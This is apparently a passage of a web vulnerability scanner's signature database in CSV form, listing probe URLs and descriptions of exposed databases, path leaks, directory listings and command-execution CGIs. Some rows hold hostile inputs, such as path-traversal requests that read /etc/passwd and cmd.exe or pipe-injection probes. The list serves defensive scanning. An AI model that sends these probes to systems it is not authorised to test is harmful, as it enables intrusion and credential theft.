"000206","","0","/scripts/repost.asp","GET","Here is your upload status","","","","","This allows uploads to /users. Create /users and give web user read only access.","","" "000207","","0","/upload.asp","GET","200","","","","","An ASP page that allows attackers to upload files to server","","" "000208","","0","/uploadn.asp","GET","200","","","","","An ASP page that allows attackers to upload files to server","","" "000209","","0","/uploadx.asp","GET","200","","","","","An ASP page that allows attackers to upload files to server","","" "000210","","0","/wa.exe","GET","200","","","","","An ASP page that allows attackers to upload files to server","","" "000211","","1","/basilix/compose-attach.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains a non-descript security vulnerability in compose-attach.php3 related to attachment uploads","","" "000212","","1","/server/","GET","200","","","","","Possibly Macromedia JRun or CRX WebDAV upload","","" "000213","","1","@CGIDIRSfpsrvadm.exe","GET","200","","","","","Potentially vulnerable CGI program.","","" "000214","","1be","/siteminder/smadmin.html","GET","Admin Login","","","","","SiteMinder admin login page available.","","" "000215","","1b","/vgn/ac/data","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000216","","1b","/vgn/ac/delete","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000217","","1b","/vgn/ac/edit","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000218","","1b","/vgn/ac/esave","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000219","","1b","/vgn/ac/fsave","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000220","","1b","/vgn/ac/index","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000221","","1b","/vgn/asp/MetaDataUpdate","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000222","","1b","/vgn/asp/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000223","","1b","/vgn/asp/status","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000224","","1b","/vgn/asp/style","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000225","","1b","/vgn/errors","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000226","","1b","/vgn/jsp/controller","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000227","","1b","/vgn/jsp/errorpage","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000228","","1b","/vgn/jsp/initialize","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000229","","1b","/vgn/jsp/jspstatus","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000230","","1b","/vgn/jsp/jspstatus56","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000231","","1b","/vgn/jsp/metadataupdate","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000232","","1b","/vgn/jsp/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000233","","1b","/vgn/jsp/style","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000234","","1b","/vgn/legacy/edit","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000235","","1b","/vgn/login","GET","200","","","","","Vignette server may allow user enumeration based on the login attempts to this file.","","" "000236","","2","/webtop/wdk/samples/index.jsp","GET","WDK Fusion Samples","","","","","Documentum Webtop Example Code","","" "000237","","2","@CGIDIRS.cobalt","GET","200","","","","","May allow remote admin of CGI scripts.","","" "000238","","2","/WEB-INF/web.xml","GET","<web-app","\<servlet","200","","","JRUN default file found.","","" "000239","https://seclists.org/bugtraq/2003/Apr/238","23","/forum/admin/wwforum.mdb","GET","200","","","","","Web Wiz Forums password database found.","","" "000240","https://packetstormsecurity.com/files/32406/xmas.txt.html","23","/fpdb/shop.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","","" "000241","https://www.exploit-db.com/exploits/22484","23","/guestbook/admin/o12guest.mdb","GET","200","","","","","Ocean12 ASP Guestbook Manager allows download of SQL database which contains admin password.","","" "000242","CVE-2002-1432","23","/midicart.mdb","GET","200","","","","","MIDICART database is available for browsing. This should not be allowed via the web server.","","" "000243","CVE-2002-1432","23","/MIDICART/midicart.mdb","GET","200","","","","","MIDICART database is available for browsing. This should not be allowed via the web server.","","" "000244","https://www.exploit-db.com/exploits/22513","23","/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb","GET","200","","","","","MPCSoftWeb Guest Book passwords retrieved.","","" "000245","","23","/news/news.mdb","GET","200","","","","","Web Wiz Site News release v3.06 admin password database is available and unencrypted.","","" "000246","CVE-2000-1036","23","/newuser?Image=../../database/rbsserv.mdb","GET","SystemErrorsPerHour","","","","","The Extent RBS ISP 2.5 allows attackers to read arbitrary files on the server.","","" "000247","https://packetstormsecurity.com/files/32406/xmas.txt.html","23","/vpasp/shopdbtest.asp","GET","xDatabase","","","","","VP-ASP shopping cart test application is available from the web. This page gives the location of .mdb files which may also be available (xDatabase).","","" "000248","https://securitytracker.com/id/1004382","23","/shopping300.mdb","GET","200","","","","","VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.","","" "000249","https://securitytracker.com/id/1004382","23","/shopping400.mdb","GET","200","","","","","VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available.","","" "000250","CVE-2002-1432","23","/shoppingdirectory/midicart.mdb","GET","200","","","","","MIDICART database is available for browsing. This should not be allowed via the web server.","","" "000251","https://web.archive.org/web/20011226154728/http://archives.neohapsis.com/archives/sf/pentest/2000-11/0147.html","23","/SilverStream/Meta/Tables/?access-mode=text","GET","_DBProduct","","","","","The SilverStream database structure is available for remote viewing.","","" "000252","https://www.medae.co/en/max/web-app","23","/database/db2000.mdb","GET","200","","","","","Max Web Portal database is available remotely. It should be moved from the default location to a directory outside the web root.","","" "000253","https://vulners.com/nessus/SAMBAR_MAILIT.NASL","28","@CGIDIRSmailit.pl","GET","200","","","","","Sambar may allow anonymous email to be sent from any host via this CGI.","","" "000254","","3","@CGIDIRSsearch","GET","=sourcedir","","","","","Apache Stronghold 3.0 may reveal the web root in the source of this CGI ('sourcedir' value).","","" "000255","","3","/doc/webmin.config.notes","GET","login and password","","","","","Webmin config file found, may contain Webmin ID/Password. Typically runs on port 10000.","","" "000256","","3","/error/HTTP_NOT_FOUND.html.var","GET","Available variants","","","","","Apache reveals file system paths when invalid error documents are requested.","","" "000257","","3","/oem_webstage/cgi-bin/oemapp_cgi","GET","This script","","","","","Oracle reveals the CGI source by prepending /oem_webstage to CGI URLs.","","" "000258","","3","@ADMINconfig.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","","" "000259","","3","@CGIDIRS.access","GET","200","","","","","Contains authorization information","","" "000260","CVE-2002-0544","3","@CGIDIRS%2e%2e/abyss.conf","GET","200","","","","","The Abyss configuration file was successfully retrieved. Upgrade with the latest version/patches for 1.0.","","" "000261","https://www.exploit-db.com/exploits/23009","3","@CGIDIRSdata/fetch.php?page=","GET","mysql_num_rows","","","","","Stellar Docs allows remote users to see file system paths. BID-8385.","","" "000262","","3","@CGIDIRSempower?DB=whateverwhatever","GET","db name whateverwhatever of directory \/","","","","","This CGI allows attackers to learn the full system path to your web directory.","","" "000263","","3","@CGIDIRSmrtg.cgi?cfg=blah","GET","Cannot find the given config file","","","","","Multi Router Traffic Grapher (mrtg.org) reveals system paths when an invalid config file is specified. Software should be upgraded to the latest version.","","" "000264","CVE-2002-0215","3","@CGIDIRSstore/agora.cgi?page=whatever33.html","GET","FILE:","","","","","Agora.cgi gives detailed error messages including file system paths.","","" "000265","CVE-2003-1242","3","/?mod=node&nid=some_thing&op=view","GET","\/node\.module\.php","","","","","Sage 1.0b3 may reveal system paths with invalid module names.","","" "000266","CVE-2003-1242","3","/?mod=some_thing&op=browse","GET","Cannot instantiate non-existent class","","","","","Sage 1.0b3 reveals system paths with invalid module names.","","" "000267","CVE-2002-0445","3","/article.php?article=4965&post=1111111111","GET","Unable to jump to row","","","","","PHP FirstPost can reveal MySQL errors and file system paths if invalid posts are sent.","","" "000268","","3","/blah123.php","GET","Failed opening","","","","","PHP is configured to give descriptive error messages that can reveal file system paths.","","" "000269","CVE-2002-0446","3","/categorie.php3?cid=june","GET","Unable to jump to row","","","","","Black Tie Project (BTP) can reveal MySQL errors and file system paths if an invalid cid is sent.","","" "000270","CWE-552","3","/CFIDE/probe.cfm","GET","coldfusion\.tagext\.lang","","","","","Cold Fusion file probe.cfm reveals system information, such as the path to the web server. In the 'Debugging Settings' page in the Administrator console, suppress the installation path displayed in error messages by selecting 'Enable Robust Exception Info","","" "000272","","3","/download.php?op=viewdownload","GET","Failed opening","","","","","PHP-Nuke allows file system paths to be revealed.","","" "000273","","3","/download.php?op=viewdownload","GET","Fatal error","","","","","PHP-Nuke allows file system paths to be revealed.","","" "000274","CVE-2002-1990","3","/examples/basic/servlet/HelloServlet","GET","The source of this servlet is in","","","","","Caucho Resin reveals file system paths with a default servlet.","","" "000275","CVE-2002-0463","3","/home.php?arsc_language=elvish","GET","Failed opening '","","","","","ARSC Really Simple Chat can reveal file system paths if an invalid language name is specified.","","" "000276","","3e","/hostadmin/?page='","GET","C:\\\\","","","","","Host Admin reveals install location and other sensitive information.","","" "000277","","3e","/hostadmin/?page='","GET","D:\\\\","","","","","Host Admin reveals install location and other sensitive information.","","" "000278","","3","/index.php?file=index.php","GET","Fatal error:","","","","","PHP-Nuke 5.4 allows file system paths to be shown in error messages.","","" "000279","CVE-2003-1535","3","/jgb_eng_php3/cfooter.php3","GET","Fatal error","","","","","Justice Guestbook may reveal file system paths in error messages.","","" "000280","","3","/JUNK(5).csp","GET","File not found: \/","","","","","Invalid files with .csp extension reveal the file system path to the web root.","","" "000281","","3","/modules.php?name=Downloads&d_op=viewdownload","GET","Failed opening","","","","","PHP-Nuke allows file system paths to be revealed.","","" "000282","","3","/modules.php?name=Downloads&d_op=viewdownload","GET","Fatal error","","","","","PHP-Nuke allows file system paths to be revealed.","","" "000283","","3","/modules.php?op=modload&name=0&file=0","GET","Failed opening","","","","","PHP-Nuke is configured to give descriptive error messages that can reveal file system paths.","","" "000284","","3","/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=","GET","non-object in","","","","","Postnuke v0.7.2.3-Phoenix and below reveal the file system path.","","" "000285","","3","/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink","GET","Failed opening","","","","","PHP-Nuke is configured to give descriptive error messages that can reveal file system paths.","","" "000286","https://www.securityfocus.com/archive/1/332566","3","/path/nw/article.php?id='","GET","c:\/","d:\/","","","","News Wizard 2.0 reveals the file system path.","","" "000288","CVE-1999-0609","3","/pw/storemgr.pw","GET","200","","","","","Encrypted ID/Pass for Mercantec's SoftCart.","","" "000289","https://securitytracker.com/id/1003644","3","/rtm.log","GET","HttpPost Retry","","","","","Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information.","","" "000290","https://www.exploit-db.com/exploits/22445","3","/scozbook/view.php?PG=whatever","GET","Warning:\sSupplied","","","","","ScozBook Beta 1.1 may reveal file system paths in error messages.","","" "000291","","3","/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter","GET","200","Error Occurred","","","","Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->","" "000292","","3","/shopa_sessionlist.asp","GET","200","","","","","VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available.","","" "000293","https://www.webhostingtalk.nl/bugtraq-mailing-lijst/23898-simplebbs-1-0-6-default-permissions-vuln.html","3","/simplebbs/users/users.php","GET","200","","","","","Simple BBS 1.0.6 allows user information and passwords to be viewed remotely.","","" "000294","https://vulners.com/exploitdb/EDB-ID:22381","3","/sips/sipssys/users/a/admin/user","GET","Password","","200","","","SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.","","" "000295","","2","/tcb/files/auth/r/root","GET","u_pwd","","","","","HP-UX has the tcb auth file system on the web server.","","" "000296","","3","@TYPO3typo3conf/","GET","200","","","","","This may contain sensitive TYPO3 files.","","" "000297","","3","@TYPO3typo3conf/database.sql","GET","200","","","","","TYPO3 SQL file found.","","" "000298","","3","@TYPO3typo3conf/localconf.php","GET","200","","","","","TYPO3 config file found.","","" "000299","https://www.securityfocus.com/bid/7186/info","3","/vchat/msg.txt","GET","200","","","","","VChat allows user information to be retrieved.","","" "000300","CVE-2003-0403","3","/vgn/license","GET","200","","","","","Vignette server license file found.","","" "000301","","3","/web.config","GET","<configuration>","","200","","","ASP config file is accessible.","","" "000302","https://www.php.net/manual/en/function.phpinfo.php","3","/webamil/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","","" "000303","https://packetstormsecurity.com/files/32406/xmas.txt.html","3","/webcart-lite/config/import.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","","" "000304","https://packetstormsecurity.com/files/32406/xmas.txt.html","3","/webcart-lite/orders/import.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","","" "000305","https://packetstormsecurity.com/files/32406/xmas.txt.html","3","/webcart/carts/","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.","","" "000306","https://packetstormsecurity.com/files/32406/xmas.txt.html","3","/webcart/config/","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.","","" "000307","https://packetstormsecurity.com/files/32406/xmas.txt.html","3","/webcart/config/clients.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","","" "000308","https://packetstormsecurity.com/files/32406/xmas.txt.html","3","/webcart/orders/","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.","","" "000309","https://packetstormsecurity.com/files/32406/xmas.txt.html","3","/webcart/orders/import.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","","" "000310","","3","/webmail/horde/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","","" "000311","","3","/whateverJUNK(4).html","GET","InterScan HTTP Version","","","","","InterScan VirusWall on the remote host reveals its version number in HTTP error messages.","","" "000312","","3","/ws_ftp.ini","GET","200","","","","","Can contain saved passwords for FTP sites","","" "000313","","3","/WS_FTP.ini","GET","200","","","","","Can contain saved passwords for FTP sites","","" "000314","CVE-2002-1528","3","@CGIDIRSMsmMask.exe","GET","200","","","","","MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.","","" "000315","","3","/_mem_bin/auoconfig.asp","GET","200","","","","","Displays the default AUO (LDAP) schema, including host and port.","","" "000316","https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt","3","/_mem_bin/auoconfig.asp","GET","LDAP","","","","","LDAP information revealed via asp.","","" "000317","https://vulners.com/osvdb/OSVDB:17664","3","/_mem_bin/remind.asp","GET","Recover","","200","","","Page will give the password reminder for any user requested (username must be known).","","" "000318","","3","/exchange/lib/ATTACH.INC","GET","File upload","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000319","https://vulners.com/osvdb/OSVDB:17659","3","/SiteServer/Admin/knowledge/persmbr/vs.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","","" "000320","https://vulners.com/osvdb/OSVDB:17661","3","/SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","","" "000321","https://vulners.com/osvdb/OSVDB:17662","3","/SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","","" "000322","https://vulners.com/osvdb/OSVDB:17660","3","/SiteServer/Admin/knowledge/persmbr/VsTmPr.asp","GET","200","","","","","Expose various LDAP service and backend configuration parameters","","" "000323","","3","/trace.axd","GET","Application Trace","","","","","The .NET IIS server has application tracing enabled. This could allow an attacker to view the last 50 web requests.","","" "000324","","3","/tvcs/getservers.exe?action=selects1","GET","200","","","","","Following steps 2-4 of this page may reveal a zip file that contains passwords and system details.","","" "000325","MS02-018","3","/whatever.htr","GET","<html>Error: The requested file could not be found\. <\/html>","","","","","May reveal physical path. htr files may also be vulnerable to an off-by-one overflow that allows remote command execution.","","" "000327","","3","/./","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Appending '/./' to a directory allows indexing","","" "000328","","3","/nsn/fdir.bas:ShowVolume","GET","200","","","","","You can use ShowVolume and ShowDirectory directly on the Novell server (NW5.1) to view the filesystem without having to log in","","" "000329","","3","/nsn/fdir.bas","GET","FDIR\sv1","","","","","You can use fdir to ShowVolume and ShowDirectory.","","" "000330","","3","/servlet/webacc?User.html=noexist","GET","templates\/","","","404","","Netware web access may reveal full path of the web server. Apply vendor patch or upgrade.","","" "000331","","4","/forum/admin/database/wwForum.mdb","GET","200","","","","","Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein","","" "000332","","4","/webmail/blank.html","GET","200","","","","","IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.","","" "000333","","5","/jamdb/","GET","200","","","","","JamDB pre 0.9.2 mp3.php and image.php can allow user to read arbitrary file out of docroot.","","" "000334","CVE-2000-0063","6","/cgi/cgiproc?","GET","200","","","","","It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later.","","" "000335","","7","@CGIDIRSaddbanner.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","","" "000336","CVE-2002-0934","7","@CGIDIRSaf.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd","GET","root:","","","","","AlienForm2 revision 1.5 allows any file to be read from the remote system.","","" "000337","","7","@CGIDIRSalienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd","GET","root:","","","","","AlienForm2 revision 1.5 allows any file to be read from the remote system.","","" "000338","","7","@CGIDIRSshtml.dll","GET","200","","","","","This may allow attackers to retrieve document source.","","" "000339","CVE-2003-0676","7","/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv","GET","root:","","","","","iPlanet Administration Server 5.1 allows remote users to download any file from the server. Upgrade to SunOne DS5.2 and in iDS5.1 SP2 Hotfix 2.","","" "000340","","8","@CGIDIRSaglimpse.cgi","GET","200","","","","","This CGI may allow attackers to execute remote commands.","","" "000341","","8","@CGIDIRSaglimpse","GET","200","","","","","This CGI may allow attackers to execute remote commands.","","" "000342","","8","@CGIDIRSarchitext_query.cgi","GET","200","","","","","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.","","" "000343","","8","@CGIDIRScgiemail-1.4/cgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","This CGI allows attackers to execute remote commands.","","" "000344","","8","/cgi-local/cgiemail-1.6/cgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","This CGI allows attackers to execute remote commands.","","" "000345","CVE-2003-0104","8","/servlet/SchedulerTransfer","GET","200","Error Occurred","","","","PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution.","","" "000346","","8","/servlet/sunexamples.BBoardServlet","GET","200","Error Occurred","","","","This default servlet lets attackers execute arbitrary commands.","","" "000347","CVE-2003-0104","8","/servlets/SchedulerTransfer","GET","200","Error Occurred","","","","PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution.","","" "000348","","8","@CGIDIRScmd.exe?/c+dir","GET","200","","","","","cmd.exe can execute arbitrary commands","","" "000349","","8","@CGIDIRScmd1.exe?/c+dir","GET","200","","","","","cmd1.exe can execute arbitrary commands","","" "000350","","8","@CGIDIRShello.bat?&dir+c:\\","GET","200","","","","","This batch file may allow attackers to execute remote commands.","","" "000351","","8","@CGIDIRSpost32.exe|dir%20c:\\","GET","200","","","","","post32 can execute arbitrary commands","","" "000352","BID-5520","8","/perl/-e%20print%20Hello","GET","200","","","","","The Perl interpreter on the Novell system may allow any command to be executed.","","" "000353","","ae","/admin.cgi","GET","Administration","","","","","InterScan VirusWall administration is accessible without authentication.","","" "000354","","ae","/interscan/","GET","Administration","","","","","InterScan VirusWall administration is accessible without authentication.","","" "000355","","a","/vgn/legacy/save","GET","200","","","","","Vignette Legacy Tool may be unprotected. To access this resource, set a cookie called 'vgn_creds' with any value.","","" "000356","","b","/","GET","default Tomcat","","","","","Appears to be a default Apache Tomcat install.","","" "000357","","b","/IDSWebApp/IDSjsp/Login.jsp","GET","200","","","","","Tivoli Directory Server Web Administration.","","" "000358","CVE-1999-0607","b","/quikstore.cfg","GET","200","","","","","Shopping cart config file, http://www.quikstore.com/, http://www.mindsec.com/advisories/post2.txt","","" "000359","","b","/quikstore.cgi","GET","200","","","","","A shopping cart.","","" "000360","","b","/securecontrolpanel/","GET","200","","","","","Web Server Control Panel","","" "000361","","b","/siteminder","GET","200","","","","","This may be an indication that the server is running Siteminder for SSO","","" "000362","","b","/webmail/","GET","200","","","","","Web based mail package installed.","","" "000363","","b","/Xcelerate/LoginPage.html","GET","Xcelerate Login Page","","","","","Xcelerate Content Server by Divine/OpenMarket login page found.","","" "000364","","b","/_cti_pvt/","GET","200","","","","","FrontPage directory found.","","" "000365","","b","/smg_Smxcfg30.exe?vcc=3560121183d3","GET","200","","","","","This may be a Trend Micro Officescan 'backdoor'.","","" "000366","","2b","/examples/servlets/index.html","GET","Servlet Examples","","","","","Apache Tomcat default JSP pages present.","","" "000367","","3b","/nsn/..%5Cutil/attrib.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000368","","3b","/nsn/..%5Cutil/chkvol.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000369","","3b","/nsn/..%5Cutil/copy.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000370","","3b","/nsn/..%5Cutil/del.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000371","","3b","/nsn/..%5Cutil/dir.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000372","","3b","/nsn/..%5Cutil/dsbrowse.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000373","","3b","/nsn/..%5Cutil/glist.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000374","","3b","/nsn/..%5Cutil/lancard.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000375","","3b","/nsn/..%5Cutil/md.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000376","","3b","/nsn/..%5Cutil/rd.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000377","","3b","/nsn/..%5Cutil/ren.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000378","","3b","/nsn/..%5Cutil/send.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000379","","3b","/nsn/..%5Cutil/set.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000380","","3b","/nsn/..%5Cutil/slist.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000381","","3b","/nsn/..%5Cutil/type.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000382","","3b","/nsn/..%5Cutil/userlist.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000383","","3b","/nsn/..%5Cweb/env.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000384","","3b","/nsn/..%5Cweb/fdir.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000385","","3b","/nsn/..%5Cwebdemo/env.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000386","","3b","/nsn/..%5Cwebdemo/fdir.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.","","" "000387","CVE-2002-2106","c","/wikihome/action/conflict.php?TemplateDir=@RFIURL","GET","PHP Version","","","","","Some versions of WikkiTikkiTavi allow external source to be included.","","" "000388","","1","@CGIDIRSarchie","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000389","","1","@CGIDIRScalendar.pl","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000390","","1","@CGIDIRScalendar","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000391","","1","@CGIDIRSdate","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000392","","1","@CGIDIRSfortune","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000393","","1","@CGIDIRSredirect","GET","200","","","","","Redirects via URL from form","","" "000394","","1","@CGIDIRSuptime","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000395","","1","@CGIDIRSwais.pl","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" "000396","","2","//","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.","","" "000397","","2","/webtop/wdk/","GET","Directory Listing for \/wdk\/","","","","","Documentum Webtop Server appears to be installed","","" "000398","https://web.archive.org/web/20011226154728/http://archives.neohapsis.com/archives/sf/pentest/2000-11/0147.html","2","/SilverStream","GET","title>.*SilverStream.*<\/title","","","","","SilverStream allows directory listing","","" "000399","","2e","/signon","GET","Administrator Login","","","","","Tivoli administrator login found. Test the default login of admin/admin. Tivoli allows system administration.","","" "000400","","2","/upd/","GET","200","","","","","WASD Server can allow directory listings by requesting /upd/directory/. Upgrade to a later version and secure according to the documents on the WASD web site.","","" "000401","","3","/examples/jsp/source.jsp??","GET","Directory Listing","","","","","Tomcat 3.23/3.24 allows directory listings by performing a malformed request to a default jsp. Default pages should be removed.","","" "000402","CVE-2002-2008","3","/lpt9","GET","FileNotFoundException:","","","","","Apache Tomcat 4.0.3 reveals the web root when requesting a non-existent DOS device. Upgrade to version 4.1.3beta or higher.","","" "000403","https://securiteam.com/windowsntfocus/5BP081F0AC/","3","/cfcache.map","GET","Mapping=","","SourceTimeStamp","","","May leak directory listing, may also leave server open to a DOS.","","" "000404","https://securiteam.com/windowsntfocus/5BP081F0AC/","3","/cfdocs/cfcache.map","GET","Mapping=","","SourceTimeStamp","","","May leak directory listing, may also leave server open to a DOS.","","" "000405","","3","/CVS/Entries","GET","200","","","","","CVS Entries file may contain directory listing information.","","" "000406","","3","/lpt9.xtp","GET","java\.io\.FileNotFoundException:","","","","","Resin 2.1 and Tomcat servers reveal the server path when a DOS device is requested.","","" "000408","https://seclists.org/fulldisclosure/2003/Jun/536","37","@PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../","GET","Ignoring file \.<\/font><\/p>","","","","","phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher.","","" "000409","","3","/asp/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000410","","3","/asp/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000411","","3","/iissamples/issamples/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000412","","3","/iissamples/issamples/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000413","","3","/ISSamples/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000414","","3","/ISSamples/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000415","","3","/junk.aspx","GET","NET Framework Version:","","\[FileNotFoundException\]:","","","ASP.NET reveals its version in invalid .aspx error messages.","","" "000416","","3","/oc/Search/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000417","","3","/oc/Search/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000418","","3","/search/htx/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000419","","3","/search/htx/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000420","","3","/search/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000421","","3","/search/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" "000422","","3","/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone 